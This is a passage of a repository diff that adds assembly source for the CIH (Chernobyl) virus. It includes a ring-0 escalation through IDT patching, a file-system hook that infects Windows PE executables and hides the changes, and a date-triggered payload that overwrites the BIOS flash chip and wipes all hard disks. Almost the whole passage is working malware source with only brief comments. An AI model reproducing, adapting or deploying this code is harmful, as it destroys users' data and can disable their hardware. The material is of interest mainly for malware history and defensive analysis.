DEBUG + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 05h + +ELSE + + FirstKillHardDiskNumber = 80h + HookExceptionNumber = 03h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + + lea eax, [esp-04h*2] + + xor ebx, ebx + xchg eax, fs:[ebx] + + call @0 +@0: + pop ebx + + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... * +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + + cli + + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + + lea esi, MyExceptionHook-@1[ecx] + + push esi + + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + + rep movsb + + sub eax, 08h + + mov esi, [eax] + + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + + xor ebx, ebx + + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. * +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + + xchg edi, eax ; EDI = SystemMemory Start Address + + lea eax, MyVirusStart-@2[esi] + + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ ; + dd 00400067h ; Use EAX, ECX, EDX, and flags + + mov dr0, eax ; Save OldFileSystemApiHook Address + + pop eax ; EAX = FileSystemApiHook Address + + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + + cli + + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + push eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + mov dr0, eax ; Adjust OldFileSystemApiHook Address + + pop eax + + pop ebx + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? + +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + ; mov esi, offset FileNameBuffer + add esi, FileNameBuffer-@6 + + push esi + + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + + add al, 40h + mov ah, ':' + + mov [esi], eax + + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. * +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + ; cmp [esi+eax-04h], '.EXE' + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + ; cmp [esi+eax-06h], 'FUCK' + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + + jc DisableOnBusy + + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? * +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + + pushf + + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + + xor ecx, ecx + mov cl, 04h + xor edx, edx + mov dl, 3ch + call edi ; VXDCall IFSMgr_Ring0_FileIO + + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? * +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** + + ; cmp [esi], '\0PE\0' + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** +; * Save ESP Register * +; *************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + + sub ecx, (SizeOfHeaders-@9)[esi] + not ecx + inc ecx + + cmp cx, small CodeSizeOfMergeVirusCodeSection + jl short OnlySetInfectedMark + +; *************************** +; * Save Original * +; * Address of Entry Point * +; *************************** + + ; Save My Virus First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + + xchg ecx, eax ; ECX = Size of Section Table + + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + + push edi ; Size + + add edx, eax + push edx ; Pointer of File + + add eax, esi + + ; Modify the Bug that WinZip Self-Extractor Occurs Error... + ; So When Open WinZip Self-Extractor, My Virus Don't Infect it... + ; The WinZip Self-Extractor Last Section Name is '_winzip_' + ; I Just Only Test Last Four Bytes ==> 'zip_' + cmp dword ptr [eax-SizeOfScetionTable+04h], '_piz' + je OnlySetInfectedMark + + push eax ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [eax+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + + add edx, edi + push edx ; Pointer of File + + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + + push ebx ; Size + + sub eax, 08h + mov [eax], ebx + + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + + push edi ; Address of Buffer + + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h + +StartToWriteCodeToSections: + + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + + add edi, ebx ; Move Address of Buffer + +EndOfWriteCodeToSections: + + loop LoopOfWriteCodeToSections + +; *************************** +; * Only Set Infected Mark * +; *************************** + +OnlySetInfectedMark: + mov esp, dr1 + + jmp WriteVirusCodeToFile + +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** + +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx + +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. ^__^ * +; *************************** + + lea eax, (LastVxDCallAddress-2-@9)[esi] + + mov cl, VxDCallTableSize + +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + + loop LoopOfRestoreVxDCallID + +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** + +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] + +LoopOfWriteVirusCodeToFile: + + pop ecx + jecxz SetFileModificationMark + + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + + call edi ; VXDCall IFSMgr_Ring0_FileIO + + jmp LoopOfWriteVirusCodeToFile + +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** + +SetFileModificationMark: + pop ebx + pop eax + + stc ; Enable CF(Carry Flag) + pushf + +; ************************************* +; * Close File * +; ************************************* + +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Need to Restore File Modification * +; * Time !? * +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + + mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + + ret + +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Month from BIOS CMOS + mov ax, 0708h + out 70h, al + in al, 71h + + xchg ah, al + + ; Get Now Day from BIOS CMOS + out 70h, al + in al, 71h + + xor ax, 0426h ; 04/26/???? + jne DisableOnBusy + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... * +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + out dx, al + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath + +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' + db MinorVirusVersion+'0' + db ' TTIT' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? +SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ + +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; ********************************************************* + +VirusGame ENDS + + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cih_14.asm b/MSDOS/Virus.MSDOS.Unknown.cih_14.asm new file mode 100644 index 00000000..d04e8f92 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih_14.asm @@ -0,0 +1,1533 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Source : TTIT of TATUNG in Taiwan * +; * Create Date : 04/26/1998 Now Version : 1.4 * +; * Modification Time : 05/31/1998 * +; * * +; * Turbo Assembler Version 4.0 : tasm /m cih * +; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. * +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; *==========================================================================* +; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * +; * So When Open WinZip Self-Extractor ==> Don't Infect it. * +; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * +; *==========================================================================* +; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * +; * 2. Change the Date of Killing Computers. * +; * 05/31/1998 3. Modify Virus Version Copyright. * +; * 4. The Virus "Basic" Size is 1019 Bytes. * +; **************************************************************************** + + .586P + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + 